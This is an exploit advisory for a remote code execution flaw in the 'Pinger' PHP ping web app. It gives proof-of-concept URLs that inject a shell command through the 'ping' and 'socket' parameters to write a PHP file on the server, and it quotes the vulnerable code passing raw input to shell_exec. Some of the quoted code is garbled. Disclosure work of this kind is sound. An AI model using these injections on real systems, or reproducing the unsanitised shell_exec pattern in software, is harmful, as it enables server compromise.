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Pinger Remote Code Execution
来源:hehsan979@gmail.com 作者:Hosseini 发布时间:2015-12-21  
Pinger - Simple Pinging Webapp Remote Code Execution
# Vendor Homepage: https://github.com/wcchandler/pinger
# Date: 17/12/2015
# Software Link: http://ehsansec.ir/apps/pinger-master.zip
# Author: Ashiyane Digital Security Team
# Contact: hehsan979@gmail.com
# Source: http://ehsansec.ir/advisories/pinger-rce.txt
# Description:
simple, easy to use jQuery frontend to php backend that pings various
devices and changes colors from green to red depending on if device is
up or down.

# PoC :

http://localhost/pinger/ping.php?ping=;echo '<?php phpinfo(); ?>' >info.php
http://localhost/pinger/ping.php?socket=;echo '<?php phpinfo(); ?>' >info.php

# Vulnerabile code:

GET['ping'])){ // if this is ever noticably slower, i'll pass it stuff when called // change the good.xml to config.xml, good is what I use at $WORK $xml = simplexml_load_file("config.xml"); //$xml = simplexml_load_file("good.xml"); if(
GET['ping'] == ""){ $host = ""; }else{ $host =
GET['ping']; } $out = trim(shell_exec('ping -n -q -c 1 -w '.$xml->backend->timeout .' '.$host.' | grep received | awk \'{print $4}\'')); $id = str_replace('.','_',$host); if(($out == "1") || ($out == "0")){ echo json_encode(array("id"=>"h$id","res"=>"$out")); }else{ ## if it returns nothing, assume network is messed up echo json_encode(array("id"=>"h$id","res"=>"0")); } } if(isset(
GET['socket'])){ $xml = simplexml_load_file("config.xml"); //$xml = simplexml_load_file("good.xml"); if(
GET['socket'] == ""){ $host = " 80"; }else{ $host = str_replace(':',' ',
GET['socket']); } $out = shell_exec('nc -v -z -w '.$xml->backend->timeout.' '.$host.' 2>&1'); $id = str_replace('.','_',$host); $id = str_replace(' ','_',$id); if(preg_match("/succeeded/",$out)){ echo json_encode(array("id"=>"h$id","res"=>"1")); }else{ ## if it returns nothing, assume network is messed up echo json_encode(array("id"=>"h$id","res"=>"0")); } } ?> ================================================================================ # Discovered By : Ehsan Hosseini ================================================================================

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